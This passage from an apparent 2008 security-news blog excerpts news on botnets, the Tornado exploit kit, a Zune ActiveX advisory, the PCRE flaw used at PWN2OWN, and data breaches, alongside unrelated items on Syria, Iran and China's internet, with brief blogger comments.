Among the evidence they displayed were pictures - said to have been obtained by Israel - allegedly taken inside the facility showing the reactor core being built.
The images showed striking similarities between the Syrian facility and the North Korean reactor at Yongbyon, the US said.
Percentage of Chinese population using the Internet is lower than global average
China is one of the most heavily populated countries in the world, but it is also has a large proportion of poor citizens without access to technology. As a result of the huge numbers of Chinese citizens the number of internet users in China is growing rapidly.
The Chinese government commonly censors the Internet and has only recently begun allowing Chinese citizens to have access to English-language websites. According to numbers released from the Chinese Ministry of Information, China now has 221 million internet users. This number is up significantly from the end of 2007 when China reported 210 million internet users.
At the end of 2007 the U.S. had 205 million internet users. The Chinese Xinhua News Agency quoted the Chinese Information Ministry as saying, “Despite rapidly increasing the Internet population, the proportion of Internet users among the total population is still lower than the global average level.”
The global average for percentage of Internet users in a country is 19.1%; China only has an average of 16%. Chinese authorities expect to have 280 million internet users by the end of 2008.
The internet is an outlet for Chinese citizens to voice opinions in a country where traditional new media is strictly controlled. The lack of control over the internet compared to the control China exerts on other forms of media led Chinese President Hu Jintao to call for a purification of the internet in 2007.
Yeah, I mean, what would happen is normal everyday citizens were allowed to have a voice and express it via the Internet. Chaos, thats what. Clearly.
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class
An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.
If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.
Sophisticated peer-to-peer (P2P) botnets like Storm that have no centralized command and control architecture have frustrated researchers because they're tough to dismantle. But a group of European researchers has come up with a way to disrupt these stealthy botnets -- by “polluting” them.
The researchers, from the University of Mannheim and the Institut Eurecom, recently infiltrated Storm to test out a method they came up with of analyzing and disrupting P2P botnets. Their technique is a spinoff of traditional botnet tracking, but with a twist: it not only entails capturing bot binaries and infiltrating the P2P network, but it also exploits weaknesses in the botnet’s P2P protocol to inject “polluted” content into the botnet to disrupt communication among the bots, as well as to study them more closely. The researchers tested their pollution method out on Storm -- and it worked. They presented their research this month at Usenix.
This is an awesome idea. But it won't be long until botnets are designed to protect their traffic a bit better - cat & mouse.
About 3,000 years ago Thursday, some Greeks left the people of Troy a wooden horse at the walled city’s front gate -- a free gift, no cost, no obligation from would-be invaders who wanted their adversaries to think they had left in peace.
Accepting the Trojan horse at face value turned out to be a big mistake.
Some things never change. In the 21st century Trojan horses are made of electronic "1s" and "0s" but are still left for you in all innocence and in plain sight: your e-mail inbox, in IMs and on a web page. But the intent, and the outcome, is pretty much the same: to pillage and steal.
The computer security industry describes computer Trojans as any program that purports to be one thing -- a screensaver or a .pdf file or a video codec -- but which actually conceals a malicious payload, like a password logger or pop-up advertising software.
One might be tempted to think we've gotten smarter in the three millennia since the Trojans ignored Cassandra's warning and accepted the first one. But when it comes to a propensity to fall for a deal that is too good to be true, humans have made little progress.
Or none whatsoever, if you believe computer-security guru Peter Neumann.
"People are still just as stupid now as they were then," says Neumann, the chief scientist at SRI's computer-security lab. "They see something shiny or a website that offers something for free and then they are dead."
But don’t expect technology to save you from yourself any time soon, Neumann warns.
-------------------------Human: You are the weakest link. Goodbye.
Man, that tiny Eee PC can be used for just about anything: surfing the web, blogging, surreptitiously hiding inside an ATM machine and stealing your identity. You know, the usual stuff. Yeah, so three creative Brazilian thieves were recently caught stuffing a black Eee into an ATM, where it replaced the ordinary magical-money-making workings and instead stole unwitting customers' card numbers and PINs. The thieves didn't stop there, however -- they purposefully damaged all the other nearby ATMs so that theirs would be the only one in service. Clever! Of course, that doesn't explain why it was so easy to crack open the target ATM in the first place -- we'd pretty much consider our cash flow problems solved if we could pull that trick.
A US court has ruled that users have a "reasonable expectation of privacy" in their internet surfing records and that police must obtain warrants from higher than usual courts in order to force ISPs to hand over records.
The Supreme Court of the state of New Jersey said that information about a person's use of the internet was so private that police there cannot order ISPs to release surfing details of suspects with a municipal court subpoena. They must receive a grand jury subpoena, it said.
"The court holds that citizens have a reasonable expectation of privacy in the subscriber information they provide to internet service providers," said the court's ruling. "Law enforcement officials can obtain subscriber information by serving a grand jury subpoena on an Internet service provider without notice to the subscriber."
Chief Justice Rabner said: "Individuals need an ISP address in order to access the internet. However, when users surf the web from the privacy of their homes, they have reason to expect that their actions are confidential. Many are unaware that a numerical IP address can be captured by the websites they visit. More sophisticated users understand that that unique string of numbers, standing alone, reveals little if anything to the outside world. Only an internet service provider can translate an IP address into a user’s name."
The case involved Shirley Reid, who was accused of hacking into her employer's computer system.
After Reid's ISP, Comcast, handed over details of her account, including the IP address from which she accessed the internet, she was found guilty of computer theft in connection with the hacking incident.
Reid overturned that decision on appeal and at the Supreme Court of New Jersey stage, arguing that the evidence should be suppressed.
Reid's lawyers had argued that a person should be informed when a subpoena is issued permitting the release of their telecommunications subscription details so that they can oppose the move. The Supreme Court of New Jersey, though, said that as long as the subpoena is from a grand jury the information can be released without the knowledge or consent of the user.
"Modern technology has raised a number of questions that are intertwined in this case: to what extent can private individuals 'surf' the 'web' anonymously? Do internet subscribers have a reasonable expectation of privacy in their identity while accessing internet websites? And under what circumstances may the State learn the actual identity of internet users?" said Chief Justice Rabner in his ruling.
"We decline to adopt a requirement that notice be provided to account holders whose information is subpoenaed," he said. "For obvious reasons, notice could impede and possibly defeat the grand jury’s investigation. Particularly in the case of computers, unscrupulous individuals aware of a subpoena could delete or damage files on their home computer and thereby effectively shield them from a legitimate investigation."
The court said that although Reid was successful in having the municipal warrant-obtained evidence suppressed, the police were not barred from approaching Comcast again and obtaining the records using an appropriate warrant.
Wednesday, April 23, 2008
Security researchers have discovered a new web-based attack tool which exploits up to 14 browser vulnerabilities and installs malware on the user's system.
Symantec researcher Liam O'Murchu said that 'Tornado' is commonly installed on a server by a single 'administrator', who then offers accounts on the server to other attackers.
The attackers then inject code into other web pages to redirect users to the Tornado server, where the exploit and malware installation is conducted.
"Perhaps this is why the code for this pack has stayed private for so long," said O'Murchu.
"Using this model, the creators of the pack can sell it to a few trusted customers at a higher price, rather than selling it to many untrustworthy customers and risking the code being released in the underground."
Tornado also offers attackers a full set of traffic statistics and options for selecting which exploits can be conducted.
The malware features an option to redirect repeat visitors to a phoney 'account suspended' page.
This helps the tool to evade security researchers who will make repeated visits to infected pages in order to study the exploits and malware in use.
Programs such as Neosploit and MPack offer similar capabilities to set up servers that can conduct multiple exploits against users.
The International Atomic Energy Agency says Iran has agreed to cooperate in clarifying whether it has tried to develop nuclear weapons. From Paris, Lisa Bryant reports the Vienna-based IAEA hopes Tehran will provide the information in May.
News of Tehran's agreement to cooperate in clarifying whether or not it has been involved in nuclear-weapons development was provided in a brief statement by the IAEA. The IAEA considers the agreement a positive sign. It comes a day after Iran's government described talks with top IAEA investigator Oli Heinonen in Tehran as positive.
The United States and other western powers believe Iran is trying to build a nuclear weapon, but Tehran says its nuclear activities are for purely peaceful purposes - to generate energy.
Talk about déjà vu....
The government is scrapping a $20 million prototype of its highly touted "virtual fence" on the Arizona-Mexico border because the system is failing to adequately alert border patrol agents to illegal crossings, officials said.
The move comes just two months after Homeland Security Secretary Michael Chertoff announced his approval of the fence built by The Boeing Co. The fence consists of nine electronic surveillance towers along a 28-mile section of border southwest of Tucson.
Boeing is to replace the so-called Project 28 prototype with a series of towers equipped with communications systems, new cameras and new radar capability, officials said.
Less than a week after Chertoff accepted Project 28 on Feb. 22, the Government Accountability Office told Congress it "did not fully meet user needs and the project's design will not be used as the basis for future" developments.
A glaring shortcoming of the project was the time lag between the electronic detection of movement along the border and the transmission of a camera image to agents patrolling the area, the GAO reported.
Although the fence continues to operate, it hasn't come close to meeting the Border Patrol's goals, said Kelly Good, deputy director of the Secure Border Initiative program office in Washington.
"Probably not to the level that Border Patrol agents on the ground thought that they were going to get. So it didn't meet their expectations."
The Border Patrol had little input in designing the prototype but will have more say in the final version, officials said.
Microsoft handed plenty of ammunition to the anti-DRM crowd on Tuesday by announcing it will no longer furnish authorization keys for songs purchased from the defunct MSN Music service.
For former customers of MSN Music--the service Microsoft operated before closing it in late 2006 and opening Zune Marketplace--August 31 will be the last day that they can move music to different computers. After that, Microsoft will no longer "support the retrieval of license keys for the songs you purchased on MSN Music or the authorization of additional computers," the company said in an e-mail to former MSN Music customers.
It's important to note that the music won't disappear after the deadline. Songs will continue to play on authorized computers. What the announcement means is that former MSN Music customers will risk losing their music libraries if they try to transfer songs to unauthorized computers or swap operating systems after Aug. 31.
There are a couple of ways to safeguard the music but they aren't pretty. Before the deadline, those affected can move songs to computers they plan to own for a while (the songs can be authorized to play on five different PCs). Another alternative is to burn songs to CDs and rerip. This means the loss of sound quality but offers more peace of mind.
Bloggers pounced on the news, writing that the situation illustrated just how anti-consumer that digital rights management is. The point most of them made: whatever hardware the songs are stored on will malfunction eventually, and the owner's music (in a high quality form at least) will be gone forever.
"Ultimately, this serves as a reminder of what DRM really is," wrote Justin Mann at TechSpot.com. It's a "way for companies to control your use of their content. Rather than purchasing, you are renting."
Companies work very hard to hide customer-based DRM's true face, but once in a while...it comes shining through....in all its ugliness.
Tuesday, April 22, 2008
Here’s another reason to hold onto your laptops: 57 percent of publicly disclosed security breaches came from lost or stolen equipment in the second half of last year, compared with only 13 percent from hacking and malware, according to Microsoft’s latest Security Intelligence Report, which was released today.
The new Microsoft report, which focuses on vulnerability and exploit data it gathered from July through December of 2007, found that exploits, malware, and hacks made up only 23 percent of security breach notifications between 2000 and 2007.
And the software giant recorded a whopping 300 percent jump in Trojan downloaders and droppers detected in the second half of ’07, as well as a curious 15 percent drop in the disclosure of new vulnerabilities. Overall, vulnerability disclosures decreased by 5 percent for all of 2007.
It was the decrease in vulnerability disclosures that most caught Microsoft by surprise, says Jimmy Kuo, principal architect of the Microsoft Malware Protection Center. “This is the first time since 2003 that there’s been such a decrease,” Kuo says.
The finding also surprised other security experts, including Doug Camplejohn, CEO of Mi5 Networks. But Camplejohn warns that one data point doesn’t make a trend. “It remains to be seen whether there's a true downward trend here, or whether vulnerability discoverers are just being more tight-lipped about vulnerabilities,” Camplejohn says.
In the last day or so we have had a massive influx of users coming to us because they are infected with a file called Chenzi.exe. After analyzing a sample in the lab here, all I can say is, this is pretty insane!
We started off with a clean machine with 56 running processes, after 10 minutes of running, we had ... 318 running processes. I tried to make a video of it, but the machine just couldn’t handle it. This file is a downloader for many things at once, one being a password stealer for various online games. We've added detections for the entire cluster of files downloaded from all the downloader’s we could get, so it would be worth a go trying to clean this up with Prevx CSI. I’d love to hear some feedback from anyone that’s had this infection. Some signs of this infection is constant popups asking you to install Chinese language packs, various Chinese websites popups, and your entire right click menu changing from English to Chinese.
The main goal of this Trojan however is based around stealing WoW accounts, let us know if you have any more info, or have been affected by this threat as it seems rather prevalent at the moment.
In the meantime I'll try and get some video footage up of this infection.
Microsoft Corp. today took credit for crushing the Storm botnet, saying that the malware search-and-destroy tool it distributes to Windows users disinfected so many bots that the hackers threw in the towel.
"They realized they were in our gun sights," said Jimmy Kuo, a principal architect with Microsoft's malware protection center, the group responsible for the Malicious Software Removal Tool (MSRT). Microsoft updates and automatically redistributes the software tool to Windows users each month on Patch Tuesday.
Last year, said Kuo, the criminals behind the Storm Trojan -- malware designed to compromise PCs and add them to a botnet, or collection of infected machines -- tried to keep pace with Microsoft and the MSRT. "They were anticipating our monthly release [of MSRT]," said Kuo, "with new versions that were ready to go immediately before our release."
The bunch controlling the Storm botnet knew that it took Kuo's group several days to create new definitions for the MSRT, and that Microsoft held to a once-a-month release schedule for the tool. And they used that lag time and set schedule to their advantage.
"They knew that it takes [us] a week or more to create new definitions, and they were prepared to update their botnet immediately prior to MSRT releasing," he said, adding that the hackers would get a new version of the Trojan onto already-infected members of the Storm botnet to try to hold on to the machines after Windows had downloaded the newest version of the MSRT.
The idea was to preempt detection by swapping out the Storm bot already on the PC with a version less likely to be identified by the MSRT.
It didn't work, said Kuo. "They found out that even that was a losing battle," he said. "Even though they were able to maintain parts of their botnet, they knew they were in our gun sights. And ultimately they gave up."
According to Kuo, it was the hammering Microsoft gave the Storm botnet that sent the hackers packing.
In the last four months of 2007, the MSRT disinfected more than 526,000 PCs plagued by the Storm bot, he claimed. The bulk of those -- more than 291,000 -- were cleaned in September, when Microsoft first added Storm detection to the MSRT. In October, the number dipped to around 90,000, then bounced back to about 100,000 each month in November and December.
The front-loaded numbers, said Kuo, were typical, since the first month that the MSRT has a new malware definition, the tool cleanses all machines that have ever been infected. In the following months, it can only disinfect PCs that have been infected since the last release of the tool.
Storm, which first appeared in early 2007 -- and got the moniker because it was first disseminated in spam messages that claimed to have news of a massive series of winter storms that swept Europe -- has been linked to the Russian Business Network (RBN), a shadowy network of malware and hacker hosting services once based in St. Petersburg.
Others have confirmed Storm's decline, and credited Microsoft.
Earlier this month, Joe Stewart, the director of malware research at SecureWorks Inc., unveiled research on the world's top 11 botnets, and using SMTP "fingerprinting" and traffic extrapolations, estimated the size of each of those spam-sending botnets. Storm, said Stewart, was No. 5 on that list of 11 and likely controlled about 85,000 PCs -- a far cry from its height in 2007 and about one-fourth as many as the leading botnet, Srizbi.
"Storm is pretty insignificant at this point," Stewart said in an interview two weeks ago. "It got all this attention, so Microsoft added it to its malicious software detection tool [in September 2007], and that's removed hundreds of thousands of compromised PCs from the botnet."
But while Kuo was happy to take the credit on behalf of Microsoft for shrinking Storm, he was realistic about the overall impact.
"What we did was to drive them [the Storm bot herders] elsewhere," he said. "They're probably out there still making money with some other botnet."
When Charlie Miller won US$10,000 for hacking into a Macbook Air laptop last month, he exploited a flaw that had been publicly disclosed nearly a year before the contest.
The flaw, it turns out, lay in an open-source software library called the Perl Compatible Regular Expressions (PCRE) library, which is used by many products including Apache, the PHP scripting language, and Apple's Safari browser, which Miller hacked to win the contest.
Miller won $10,000 and a new Macbook Air last month after hacking into the laptop in a matter of minutes. The PWN2OWN contest invited hackers to try to install unauthorized software on fully patched Mac OS X, Windows and Linux computers using previously undisclosed "zero-day" flaws.
In an e-mail interview, security researcher Chris Evans said he found the bug, which he publicly disclosed in November 2007. PCRE developers fixed the bug months earlier while writing an incomplete fix for the issue in the May 2007 PCRE 6.7 product, Evans said.
Although Apple's Safari browser uses the PCRE software library, the company did not patch its version of the library until late last week. That means that an astute hacker who had noticed the fix in PCRE 6.7 would have been given an early tip on how to hack into Apple's computers.
Discovering a software bug is the first step toward figuring out how to use that flaw in an attack, but not every flaw leads to a successful exploit.
In an e-mail interview, Miller confirmed that the bug he'd exploited was the same one that was patched in PCRE 6.7, but said that researchers at his company, Independent Security Evaluators, had found it "completely independently."
Miller found another PCRE bug that allowed him to be the first hacker to break into the iPhone after it was launched last year.
It is very common for developers to incorporate someone else's software library into their program and then not properly add all the latest bug fixes, said Dragos Rui, one of the organizers of the PWN2OWN contest.
However, Apple should have done a better job of staying on top of the software it was shipping. "This is a black mark on their security team, but it's a common problem," he said. The same kind of issue has popped up frequently with products that use the zlib and JPEG compression libraries, he added.
An Apple representative could not immediately comment for this story, saying that he would have to first research the issue.
Ironically, Miller gave a presentation at the Black Hat security conference last year, arguing that one way to find bugs in Mac OS X would be to look for out-of-date open-source software that ships with the Mac and then to scan that project's files.
I told Apple about this backporting problem then and they didn't listen and I didn't listen either, because we didn't find the bug by looking at changelogs, we found it with source code analysis," Miller said.
Although the focus of the PWN2OWN contest was on zero-day flaws, the fact that Miller exploited a flaw that was unpatched in Apple's products was enough to earn him the prize, conference organizers say.
That's a good thing, because when asked if he planned to return the prize money, Miller shot back the following: "No way. It's not my fault they don't fix their bugs."
This speaks for itself....but clearly, Apple failed to backport a open-source fix into their product. A year later, it is used for pure drive-by download pwnage in its browser.
I have been saying this for some time and so have many many other security professionals. It is only a manner of time before this exact issue takes a bigger bite of Apple - unless they really crack down and get serious about working open source patches back into their products in a timely fashion.
Web-based lending exchange LendingTree, which generates leads in the mortgage business by accepting online customer information, yesterday disclosed that it believes several former employees illicitly helped a handful of mortgage lenders gain access to customer data.
"Recently, LendingTree learned that several former employees may have helped a handful of mortgage lenders gain access to LendingTree's customer information by sharing confidential passwords with the lenders," LendingTree stated in a letter sent April 21 to its customers. "When we learned of this situation, we quickly contacted the authorities, and LendingTree is helping with the investigation. We promptly made several system-security changes. We also brought lawsuits against those involved."
LendingTree spokeswoman Allison Vail acknowledged the letter had been sent to customers, but declined to provide further details, such as how many customers would be affected.
LendingTree believes the lenders gained illicit entry to its data systems to access LendingTree’s loan-request forms between October 2006 and early 2008. The Charlotte, N.C.-based firm stated that the loan-request forms contained such customer data as name, address, e-mail address, telephone number, Social Security Number, income and employment information.
LendingTree said it is not aware of identity theft or fraudulent activity resulting from the breach.